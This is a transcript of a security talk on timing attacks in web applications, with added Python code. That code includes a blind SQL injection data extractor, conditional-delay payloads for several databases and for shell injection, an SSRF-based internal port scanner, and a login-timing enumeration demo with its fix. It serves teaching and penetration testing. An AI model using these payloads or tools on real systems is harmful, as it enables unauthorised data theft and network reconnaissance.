Timing-based attacks in web applications · 05/02/2018
TRANSCRIPT
![Page 1: TIMING-BASED ATTACKS IN WEB APPLICATIONS · 05/02/2018 · Before : Chemical Engineer Current : Pentester @ Aura Information Security Hobbies : Backpacking, Watching Animes Member](https://reader035.vdocument.in/reader035/viewer/2022071210/602198c9c5ff2f60f87e217b/html5/thumbnails/1.jpg)
TIMING-BASED ATTACKS IN WEB APPLICATIONS
ABOUT ME
Ahmad Ashraff @Yappare
Before : Chemical Engineer
Current : Pentester
@ Aura Information Security
Hobbies : Backpacking, Watching Animes
Member of OWASP MY Chapter, 2nd in Bugcrowd
ABOUT THE PRESENTATION
• Not about how to be no. 2 in Bugcrowd
• Most of the content is already known – just a refresher
• No trees or animals were harmed
• No zero-days
WHAT IS IT?
A timing attack is a side-channel attack: the attacker infers potentially sensitive information from a web application by measuring how its response times differ between inputs, rather than from anything the application deliberately returns.
tl;dr – vulnerabilities based on response times given by application.
IS IT NEW?
SO, WHY WANT TO PRESENT IT?
• Hard to detect with automated web scanners, a.k.a. the "pentester's good friend"
• Modern websites and frameworks generally have built-in prevention for web attacks from user input, typically a blacklist of known-bad patterns
• No one has the 'time'
• 'Young' pentesters have no patience
SO, WHY WANT TO PRESENT IT?
• Importantly..
COMMON WEB VULNERABILITY WITH ‘TIME’ IN NAME
• Time-based SQL injection
• Unsanitised input -> inject a query that delays the response, and infer data from whether the delay happens
• Blind: nothing from the database appears in the response, the delay is the only signal
• Scanners report false positives, because a slow response on its own is not proof of injection

Time-delay functions per database:

| MySQL | MSSQL | Oracle | PostgreSQL |
|---|---|---|---|
| SLEEP() | WAITFOR DELAY | BEGIN DBMS_LOCK.SLEEP() | pg_sleep() |
| BENCHMARK() | WAITFOR TIME | UTL_HTTP.REQUEST() | |
| | | UTL_INADDR.get_host_address() | |
| | | UTL_INADDR.get_host_name() | |
```sql
-- MySQL: the response takes about one second ...
select 1 and sleep(1);
-- ... and about two with sleep(2). The delay tracks the argument, which rules
-- out ordinary network slowness.
select 1 and sleep(2);
```
```sql
-- MySQL without SLEEP(): BENCHMARK() hashes 'A' a million times. Doubling the
-- count roughly doubles the response time; the absolute delay is CPU-bound and
-- therefore depends on the server.
select BENCHMARK(1000000,MD5('A'));
select BENCHMARK(2000000,MD5('A'));
```
http://sqlmap.org/
COMMON WEB VULNERABILITY WITH ‘TIME’ IN NAME
• Remote code execution – blind/time-based
• IF statement + SLEEP command: the command runs only when the condition holds, so the response is delayed only then
```sh
# Template used in the demo: `time` reports how long the conditional took.
# When [ statement ] is true, [ command ] (e.g. sleep 5) runs and the
# wall-clock time rises; when it is false the command is skipped and the
# call returns at once.
time if [ statement ];then [ command ]; fi
```
https://github.com/dancezarp/TBDEx ← Vulnerable web app
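The time-based SQL injection slides and the blind RCE slides above describe the same loop: send a payload that delays only when a condition is true, time the response, and turn the yes/no answers into data. The Python below is an added example written for this transcript, not code from the talk, from TBDEx or from sqlmap. It builds the conditional-delay payloads for the functions in the table (plus the shell `if ...; then sleep` form from the RCE slide), confirms each apparent delay with a second request before trusting it, and recovers a string with a binary search over printable ASCII. The application is a constructed stand-in (`fake_send`, with a made-up `SECRET` and the query `SELECT password FROM users LIMIT 1`) that emulates MySQL evaluating the MySQL probe; to use `extract()` against a real target, replace `fake_send` with a function that puts the payload in the HTTP request and returns when the response arrives.

```python
import re
import statistics
import time


def delay_payload(target, condition, seconds):
    """Conditional-delay payload for the functions in the table: delays only when
    `condition` is true. Quoting/comment characters around it depend on the
    injection point and are left to the tester."""
    if target == "mysql":
        return f"IF({condition},SLEEP({seconds}),0)"
    if target == "mssql":  # statement level, so it needs stacked queries
        return f"IF ({condition}) WAITFOR DELAY '0:0:{seconds}'"
    if target == "postgresql":
        return f"(SELECT CASE WHEN ({condition}) THEN pg_sleep({seconds}) ELSE pg_sleep(0) END)"
    if target == "oracle":  # PL/SQL block; the account needs EXECUTE on DBMS_LOCK
        return f"BEGIN IF ({condition}) THEN DBMS_LOCK.SLEEP({seconds}); END IF; END;"
    if target == "shell":  # OS command injection, the `time if ...` slide
        return f"; if [ {condition} ]; then sleep {seconds}; fi"
    raise ValueError(f"unknown target {target!r}")


def timed(send, payload):
    """Seconds the application took to answer `payload`."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def is_delayed(send, payload, threshold, confirm=2):
    """True only if every one of `confirm` requests exceeds the threshold: a real
    SLEEP delays every time, network jitter rarely does twice in a row."""
    for _ in range(confirm):
        if timed(send, payload) < threshold:
            return False
    return True


def extract(send, query, delay=0.06, max_len=32, confirm=2):
    """Recover the first row of `query` one character at a time from timing alone
    (MySQL syntax). Binary search over printable ASCII costs 7 probes per
    character instead of one probe per candidate character."""
    quiet = delay_payload("mysql", "1=2", delay)  # never sleeps: measures the baseline
    baseline = statistics.median(timed(send, quiet) for _ in range(5))
    threshold = baseline + delay / 2

    def greater_than(pos, mid):
        cond = f"ASCII(SUBSTRING(({query}),{pos},1))>{mid}"
        return is_delayed(send, delay_payload("mysql", cond, delay), threshold, confirm)

    result = []
    for pos in range(1, max_len + 1):
        if not greater_than(pos, 0):  # past the end of the string: ASCII('') is 0
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        result.append(chr(lo))
    return "".join(result)


# --- constructed stand-in for the vulnerable application (not a real target) ---
SECRET = "p4ss"  # what the simulated database holds
_MYSQL_PROBE = re.compile(r"SUBSTRING\(\(.*?\),(\d+),1\)\)>(\d+),SLEEP\(([\d.]+)\)")


def fake_send(payload):
    """Emulates MySQL evaluating the probe built by extract() against SECRET and
    sleeping when the condition holds; swap in a real HTTP request to use it."""
    m = _MYSQL_PROBE.search(payload)
    if m:
        pos, mid, secs = int(m.group(1)), int(m.group(2)), float(m.group(3))
        code = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
        if code > mid:
            time.sleep(secs)


if __name__ == "__main__":
    print(extract(fake_send, "SELECT password FROM users LIMIT 1"))  # p4ss
```

The confirmation step is what the NOTES slide asks for: one slow response proves nothing, but a payload that delays every time it is sent, and a control payload that never does, is hard to explain by anything other than the injected sleep. Keep `delay` small and `confirm` low on a production target, since every true branch costs the server a sleeping worker.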
USER ENUMERATION
• https://www.owasp.org/index.php/Testing_for_User_Enumeration_and_Guessable_User_Account_(OWASP-AT-002)
• Use brute-force to either guess or confirm valid users in a system
• Login, registration, forgot password
• Easy but not common
• Low to medium risk
Basic access authentication
An example cURL command to get the response time when requesting a URL with HTTP Basic authentication credentials embedded in it. `-o /dev/null` discards the body, `-s` silences the progress output and `-w '%{time_total}\n'` prints the total request time. The password and host in the original demo URL were mangled in this transcript, so they are shown as placeholders:

```sh
curl -o /dev/null -s -w '%{time_total}\n' "http://username:<password>@<host>/authentication/example2"
```
USER ENUMERATION - PREVENTION
• Prevent bruteforce on sensitive forms
• Fixed response times: no difference between a valid and an invalid username
• Hashing: run the password hash (or an equivalent dummy computation) even when the username does not exist, so both code paths cost the same
• Prevents brute force by limiting attempts (https://www.drupal.org/node/1023440)
• No obvious timing difference

• No brute-force prevention
• No obvious timing difference
• Other methods can still be used for user enumeration
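As an added example (not code from the talk), the Python below shows where the timing difference on the login and Basic-auth slides comes from and what the "Hashing" fix means. `login_vulnerable` returns early for an unknown username, so only real usernames pay for the password hash; `login_hardened` runs the KDF and a constant-time comparison on every attempt, whether or not the user exists. `timing_gap` plays the attacker, taking the median of several attempts the way the curl `%{time_total}` loop does. The users, passwords, salt and iteration count are constructed, and PBKDF2 from the standard library is used as the KDF for the example rather than taken from any particular application.

```python
import hashlib
import hmac
import os
import statistics
import time

ITERATIONS = 200_000  # constructed: enough work that the KDF dominates the request time
SALT = os.urandom(16)


def kdf(password: str, salt: bytes) -> bytes:
    """Slow password hash; the cost of this call is what the attacker measures."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


USERS = {"alice": kdf("correct horse battery", SALT)}  # constructed user table
DUMMY_HASH = kdf("placeholder", SALT)  # compared against when the user is unknown


def login_vulnerable(username: str, password: str) -> bool:
    """Unknown user returns early, before the expensive hash: a timing oracle."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return hmac.compare_digest(kdf(password, SALT), stored)


def login_hardened(username: str, password: str) -> bool:
    """Always run the KDF and a constant-time compare, whether or not the user exists."""
    stored = USERS.get(username)
    candidate = kdf(password, SALT)
    matched = hmac.compare_digest(candidate, stored if stored is not None else DUMMY_HASH)
    return matched and stored is not None


def median_response(login, username: str, samples: int = 5) -> float:
    """What the attacker sees: median wall-clock time of a failed login attempt."""
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        login(username, "definitely-wrong")
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def timing_gap(login, existing: str = "alice", missing: str = "mallory") -> float:
    """Seconds by which a real username answers slower than a made-up one."""
    return median_response(login, existing) - median_response(login, missing)


if __name__ == "__main__":
    print(f"vulnerable gap: {timing_gap(login_vulnerable):.4f}s")
    print(f"hardened gap:   {timing_gap(login_hardened):.4f}s")
```

The hardened version removes the signal but not the attempts, which is why the prevention slide lists brute-force limiting first: with rate limiting in place the attacker cannot collect enough samples to average out jitter, and with equal code paths there is nothing left to average.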
CROSS SITE PORT ATTACK (XSPA) / SERVER SIDE REQUEST FORGERY (SSRF)
• https://www.owasp.org/index.php/Server_Side_Request_Forgery
• Abuse application/server functionality to read or update internal resources
• Abuse application/server functionality to port-scan internal hosts (XSPA)
[Diagram: web application reachable via the Internet, with the intranet behind it]
What SSRF usually looks like:
http://testingserver/bWAPP/rlfi.php?language=http://localhost:22&action=go
The injected URL carries the protocol (http://), the targeted IP (localhost) and the service port (22).
[Diagram: attacker -> bWAPP web application via the Internet -> intranet containing Internal PC 192.168.0.25]
[Diagram: the attacker cannot reach Internal PC 192.168.0.25 directly]
Through the vulnerable SSRF, the application takes a long time to respond when asked to fetch http://192.168.0.25:
http://testingserver/bWAPP/rlfi.php?language=http://192.168.0.25&action=go
Varying the port in the same request and comparing the response times tells the attacker which ports on the internal host are open (XSPA), even though the attacker cannot reach that host directly:
http://testingserver/bWAPP/rlfi.php?language=http://192.168.0.25:port&action=go
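The bWAPP slides infer port state from how long the server-side fetch takes. The Python below is an added example, not part of the talk or of bWAPP. It stands up three ports on 127.0.0.1 (a constructed HTTP service that answers after about 80 ms, a listener that accepts connections but never answers, and a port nothing listens on), fetches each through `ssrf_fetch`, a stand-in for `rlfi.php?language=<url>` that hides every error and leaves only the elapsed time visible, and classifies the ports from the median duration. The 0.5 s fetch timeout and the 30 ms / 80 % thresholds are assumptions for a local or LAN target; against a real application they have to be calibrated from a known-closed and a known-open port first.

```python
import http.server
import socket
import socketserver
import statistics
import threading
import time
import urllib.request

TIMEOUT = 0.5  # assumption: how long the vulnerable app waits for its fetch


class _SlowHandler(http.server.BaseHTTPRequestHandler):
    """Constructed internal HTTP service that takes ~80 ms to answer."""

    def do_GET(self):
        time.sleep(0.08)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"internal service\n")

    def log_message(self, *args):  # keep the demo output quiet
        pass


def start_http_service():
    """Open port that speaks HTTP; returns (port, server) so it can be shut down."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), _SlowHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_address[1], srv


def start_silent_service():
    """Open port that accepts connections but never answers, like a non-HTTP daemon."""
    sock = socket.socket()
    sock.bind(("127.0.0.1", 0))
    sock.listen(5)
    return sock.getsockname()[1], sock


def closed_port():
    """A port nothing listens on: the kernel refuses the connection immediately."""
    sock = socket.socket()
    sock.bind(("127.0.0.1", 0))
    port = sock.getsockname()[1]
    sock.close()
    return port


def ssrf_fetch(url, timeout=TIMEOUT):
    """Stand-in for the vulnerable server-side fetch: swallows every error, so the
    attacker never sees a message, only how long the request took."""
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except OSError:  # URLError, ConnectionRefusedError and timeouts are all OSError
        pass


def probe(host, port, samples=3):
    """Median wall-clock time of the server-side fetch to host:port."""
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        ssrf_fetch(f"http://{host}:{port}/")
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def classify(elapsed, timeout=TIMEOUT):
    """Map a fetch duration to a port state; thresholds are assumptions for a LAN."""
    if elapsed >= 0.8 * timeout:
        return "silent"  # connected, but nothing came back before the app gave up
    if elapsed < 0.03:
        return "closed"  # refused at once (TCP RST)
    return "open"  # a service answered


def scan(host, ports):
    return {port: classify(probe(host, port)) for port in ports}


def demo():
    """Set up one port of each kind on localhost and scan them through the fetch."""
    http_port, srv = start_http_service()
    silent_port, keep = start_silent_service()  # keep the socket alive while scanning
    refused_port = closed_port()
    try:
        result = scan("127.0.0.1", [http_port, silent_port, refused_port])
        return {"http": result[http_port], "silent": result[silent_port], "closed": result[refused_port]}
    finally:
        srv.shutdown()
        srv.server_close()
        keep.close()


if __name__ == "__main__":
    print(demo())
```

On a real target the "silent" band is usually the most informative one: a port that holds the connection open until the application's timeout is listening, just not speaking HTTP, which is exactly the case for the SSH example on the earlier slide. Because every probe of such a port ties up a server-side worker for the full timeout, scan a short list of ports with few samples rather than the whole range, as the NOTES slide warns.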
Timing based attacks in bug bounty
SQL Injection and RCE
Username Enumeration
SSRF/XSPA
```json
{ "ImageUrls": [ "http://jd0s36c0nizcxbs2z7nfk7svtmzcn1.burpcollaborator.net" ] }
```
```json
{ "ImageUrls": [ "http://localhost:<port>" ] }
```
NOTES
• Do not forget to test for timing-based attacks in your testing
• Be careful when performing the attack, as it can impact the server's performance (DoS)
• A delayed response does not by itself confirm a vulnerability; further testing and observation are required
REFERENCES
• https://owasp.org
• https://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/
• https://ibreak.software/2013/04/xspa-ssrf-vulnerability-with-the-adobe-omniture-web-application/
• https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/